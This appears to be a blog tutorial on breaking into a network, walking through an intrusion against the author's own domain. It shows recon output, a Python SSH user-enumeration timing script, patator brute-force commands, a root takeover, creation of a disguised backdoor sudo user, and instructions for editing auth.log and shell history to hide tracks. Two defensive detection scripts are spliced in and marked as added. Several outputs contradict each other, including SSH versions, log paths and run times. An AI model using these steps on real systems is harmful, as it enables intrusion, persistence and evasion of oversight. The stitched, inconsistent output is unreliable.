
How A Hacker Can Get Into A Network

A hacker used reconnaissance like Google searches and DNS lookups to gather information about a target network called ashellz.com. Scanning with Nmap revealed open ports and services. Enumeration with a Python script identified valid user accounts like root and allamoox. Gaining access was achieved by brute forcing weak passwords for the allamoox and jack3 accounts. Privilege escalation occurred when the jack3 account was found to have sudo privileges, allowing the hacker to add a backdoor user called system.

A hacker can get his feet into a network via different techniques, and for different reasons.

A network can be targeted by a hacker for whatever reason he has, in which case it is a target of choice, or it can simply be a target of opportunity that he found through a random scan.
-If a network is not a target of choice it doesn't mean that it is safe, because it is just a matter of time until it becomes a target of opportunity. Usually hackers go through these well-known steps to gain access to a network:
1- Reconnaissance and foot/fingerprinting:- Reconnaissance is the first step of an attack, and this phase is mostly about information gathering: all the information the hacker can collect about the victim, even if it seems simple and useless. He can collect it in different ways, for example simple dumpster diving around the target's office, checking the staff's social network profiles, googling the target and noting what he finds, or social engineering. Footprinting then completes the step. Footprinting is mainly a study of the network itself, for example how the devices are connected together, how many devices the network has, its infrastructure, firewalls, etc.
This phase depends on OSINT (open source intelligence), with no direct contact with the target.
2- Scanning:- The attacker now engages with the target for more specific details, for example open ports and running services. Let's say we find port 22 open; a simple telnet command then reveals the SSH version running on the server.
3- Enumeration, gaining access and privilege escalation:- Three different processes. First, enumeration, through an active connection, lets the hacker learn which of the accounts he wants access to are valid; for example, he knows from the previous steps (reconnaissance, footprinting and scanning) that an SSH service is running on the default port 22, and by enumerating he can tell whether a user is valid or not with a simple Python script. The next step is brute forcing a valid account. If he succeeds in gaining access to the SSH server, he will then attempt privilege escalation if the brute-forced account does not have superuser powers.
4- Creating a backdoor and covering tracks:- In this phase the hacker has already gained access and will install a rootkit or backdoor to guarantee himself free entry to the network later on, for example by creating a new user and adding it to the sudo list. The last step is covering his tracks by editing the logs and removing the entries that reveal him.
A hacker will never delete the logs outright, as that would get the network administrator's attention.

The section above was a short description of how a hacker can get into a network. The following section is a real-life example of breaking into a network.
A real-life example:
Let's say a hacker would like to take over ashellz.com (it's owned by me). I will try to demonstrate the process step by step according to the explanation above.
Reconnaissance and footprinting:-

Google the target domain ashellz.com.

Whois the target domain.
root@Mox:/home/allamoox# whois ashellz.com
Registrant domain : Goddady.com
Tech Email: [email protected]
Name Server: NS8015.HOSTGATOR.COM
Name Server: NS8016.HOSTGATOR.COM
Tech Name: mahmoud allam
Tech Organization: aLLamoox
Tech Street: aol tarik shobar
Tech City: Tanta
Tech State/Province: gHARBIA
Tech Postal Code: 31111
Tech Country: EG
Tech Phone: +20.104691184
Dig the target domain, using dig with the switch any to show all records.
root@Mox:/home/allamoox# dig ashellz.com any
ashellz.com.   14385  IN  A    192.185.16.67
ashellz.com.   86385  IN  SOA  ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
ashellz.com.   14385  IN  MX   0 mail.ashellz.com.
ashellz.com.   14385  IN  TXT  "v=spf1 a mx include:websitewelcome.com ~all"
ashellz.com.   86385  IN  NS   ns8016.hostgator.com.
ashellz.com.   86385  IN  NS   ns8015.hostgator.com.

These steps can be considered a passive scan.


Scanning:- Using nmap with the switch -O to detect the OS and -sS so that the connection is closed before completing the three-way handshake.
root@Mox:/home/allamoox# nmap -O -sS ashellz.com
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
25/tcp filtered smtp
26/tcp open rsftp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2222/tcp open EtherNetIP-1
3306/tcp open mysql
8080/tcp open http-proxy
8443/tcp open https-alt
Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux
2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%).
root@Mox:/home/allamoox# telnet private.ashellz.com 22
Trying 158.69.197.45...
Connected to private.ashellz.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
With a simple search about OpenSSH_6.0p1 Debian-4+deb7u6 the hacker will find that it is vulnerable to user enumeration.
These steps can be considered an active scan.
Enumeration:- At this point the hacker has a good idea about the target and which parts are vulnerable, and he will start enumerating valid accounts for the SSH service via a timing attack technique.
The technique depends on the time the server takes to authenticate a user, so we use a 10kb password, which means that if the user doesn't exist we get an answer from the server faster than for an existing user.
The hacker will use this simple Python script to enumerate valid users.
#Including the paramiko library
import paramiko
#Including the time library
import time
#Asking for the username to be checked
user = input("user: ")
#Supplying the password as the letter A repeated 25000 times
p = 'A' * 25000
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#Taking the wall-clock time just before the authentication attempt
starttime = time.time()
try:
    #Opening an SSH connection to the ashellz.com server with the chosen user and the 25000 letter password
    ssh.connect('192.185.16.67', username=user, password=p)
except Exception:
    #Authentication fails either way; only the time the server took to answer matters
    pass
#Printing the time taken to authenticate the user
endtime = time.time()
total = endtime - starttime
print(total)
python code.py
Now we get a few valid accounts such as (root, allamoox, allam, test).
Gaining access:-
Using patator (a Python script used for brute forcing a lot of services like FTP, SSH, etc.) against this list of users.
allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/user.txt 0=/home/allamoox/easy_guess.txt -x ignore:mesg='Authentication failed.'
17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
17:45:12 patator INFO -
17:45:12 patator INFO - code size time | candidate | num | mesg
17:45:12 patator INFO - -----------------------------------------------------------------------------
17:51:22 patator INFO - 0 37 0.204 | test123:test | 1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 0h 1m 2s
The hacker gets two accounts in just a few minutes because of weak passwords.
Privilege escalation:-
Now that the hacker has valid accounts, he will check whether one of them is in the sudo list by running any command as superuser:
test@aShellz:/home/allamoox$ sudo uptime
[sudo] password for test:
test is not in the sudoers file. This incident will be reported.
test@aShellz:/home/allamoox$
It isn't a superuser, but it is still a very useful account. The hacker will then list the accounts on the server by reading the group file with this command:
test@aShellz:/home/allamoox$ cat /etc/group
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:allamoox,xenthys,jack3
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
netdev:x:101:
input:x:102:
systemd-journal:x:103:
systemd-timesync:x:104:
systemd-network:x:105:
systemd-resolve:x:106:
systemd-bus-proxy:x:107:
ssh:x:108:
messagebus:x:109:
Now the hacker will try to hack any of the sudo accounts (sudo:x:27:allamoox,xenthys,jack3), which will give him the server. Again he will try to brute force them via patator, but with a somewhat more complicated wordlist.
allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/20_million_password_list_top_2000000.txt -x ignore:mesg='Authentication failed.'
17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
17:45:12 patator INFO -
17:45:12 patator INFO - code size time | candidate | num | mesg
17:45:12 patator INFO - -----------------------------------------------------------------------------
17:51:22 patator INFO - 0 37 0.204 | qazxswedc123:jack3 | 1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 21h 1m 49s.
As we can see, jack3 used a pattern password (a keyboard walk), and it was included in a huge wordlist, so his account got hacked. The hacker will now become root.
jack3@aShellz:/home/jack3$ sudo su
[sudo] password for jack3:
root@aShellz:/home/jack3#
He will add another account and put it in the superuser list to guarantee himself free entry into the server in the future, using an inconspicuous name like system.
root@aShellz:/home/allamoox# adduser system
Adding the user to the sudo group:
root@aShellz:/home/allamoox# usermod -G sudo system
root@aShellz:/home/allamoox# cat /etc/group |grep sudo
sudo:x:27:jack3,xenthys,allamoox,system
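Seen from the administrator's side, the difference between the two sudo lines on this page (allamoox,xenthys,jack3 before, with system appended after) is exactly what a periodic audit of /etc/group should catch. The following is an added example, not part of the original document, that compares privileged-group membership against a saved baseline; the two group-file excerpts are constructed, with only the sudo lines mirroring the page.

```python
# Constructed baseline and current /etc/group excerpts: the two sudo lines mirror the
# before/after state shown above, the remaining lines are placeholders.
BASELINE_GROUP = """\
root:x:0:
shadow:x:42:
sudo:x:27:allamoox,xenthys,jack3
users:x:100:
"""
CURRENT_GROUP = """\
root:x:0:
shadow:x:42:
sudo:x:27:jack3,xenthys,allamoox,system
users:x:100:
"""
# Groups whose membership grants or leads to root; extend to match the host's policy
PRIVILEGED = {"root", "sudo", "wheel", "adm", "shadow"}

def parse_group(text):
    """Map group name -> set of supplementary members from /etc/group formatted text."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = {m for m in members.split(",") if m}
    return groups

def privileged_drift(baseline_text, current_text, privileged=PRIVILEGED):
    """Return {group: (added, removed)} for privileged groups whose members changed.

    Sets are compared, so a reordered member list (as in the page's two sudo lines)
    is not reported on its own; only real additions or removals are.
    """
    base, cur = parse_group(baseline_text), parse_group(current_text)
    drift = {}
    for group in privileged & (set(base) | set(cur)):
        added = cur.get(group, set()) - base.get(group, set())
        removed = base.get(group, set()) - cur.get(group, set())
        if added or removed:
            drift[group] = (added, removed)
    return drift
```

On a real host the baseline would be captured at build time and kept off the box, so that an intruder with root cannot rewrite the reference copy along with /etc/group.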
Then the hacker will clear his tracks from the log.
To see how many lines, words and characters the log file has:
root@aShellz:/home# wc /var/logs/auth.log
200601 2731431 21813737 logs.txt
More than 200k lines.
The hacker will open the file to delete only his own tracks from the log, for example lines like the following:
root@aShellz:/home# nano /var/logs/auth.log
Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 81.229. port 35784 ssh2
Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
For sure there are many lines the hacker needs to delete; he might use an awk or sed command to delete every line containing "Failed password" under the date Sep 24.
The last thing the hacker will do is clear his commands from the shell history as well.
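Seen from the administrator's side, the three log lines above (failed logins, a password change, a new group) are the events that should raise an alert before the hacker gets the chance to edit them out. The following added example, not part of the original document, parses constructed auth.log lines in that format and flags repeated failures per source address, a successful login from a source that was brute forcing, and account or sudo-group changes; the host name, user names and the 198.51.100.7 address are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample in the auth.log format quoted above: host name, user names and
# the 198.51.100.7 source address are placeholders, not data from the original document.
SAMPLE_LOG = """\
Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 198.51.100.7 port 35784 ssh2
Sep 24 21:27:34 vps1670 sshd[1721]: Failed password for allamoox from 198.51.100.7 port 35790 ssh2
Sep 24 21:27:36 vps1670 sshd[1723]: Failed password for invalid user admin from 198.51.100.7 port 35794 ssh2
Sep 24 21:27:39 vps1670 sshd[1725]: Failed password for jack3 from 198.51.100.7 port 35801 ssh2
Sep 24 21:27:41 vps1670 sshd[1727]: Accepted password for jack3 from 198.51.100.7 port 35807 ssh2
Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
Sep 24 21:50:40 vps1670 usermod[1952]: add 'system' to group 'sudo'
Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
"""

# sshd failure/success lines; "invalid user" marks a name that does not exist on the host
FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port")
# account and group changes written by the shadow-utils tools and by passwd
ACCOUNT_CHANGE = re.compile(r"(groupadd|useradd|usermod|gpasswd|passwd)\[\d+\]: (.*)")

def analyse(log_text, threshold=3):
    """Return a list of (severity, message) findings for auth.log text."""
    failures = defaultdict(list)   # source address -> user names that failed from it
    findings = []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            failures[src].append(user)
            if len(failures[src]) == threshold:   # report once per source, not per attempt
                findings.append(("medium", f"{src}: {threshold} failed logins, users tried: "
                                           f"{sorted(set(failures[src]))}"))
            continue
        m = ACCEPTED.search(line)
        if m:
            user, src = m.groups()
            if len(failures[src]) >= threshold:   # the brute force paid off: highest priority
                findings.append(("high", f"{src}: login as {user} succeeded after "
                                         f"{len(failures[src])} failures"))
            continue
        m = ACCOUNT_CHANGE.search(line)
        if m:
            tool, detail = m.groups()
            severity = "high" if "sudo" in detail else "medium"   # new sudo member = backdoor
            findings.append((severity, f"{tool}: {detail}"))
    return findings
```

In practice the detector should run on a copy of the log shipped to a central log server, since a log kept only on the compromised host is exactly what the hacker edits in this scenario.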
P.S.: The hacker can use completely different scenarios depending on the situation.

A solution could be a well-enforced security policy, a program like Fail2ban to block any brute-force attempt, and a properly configured, active firewall.
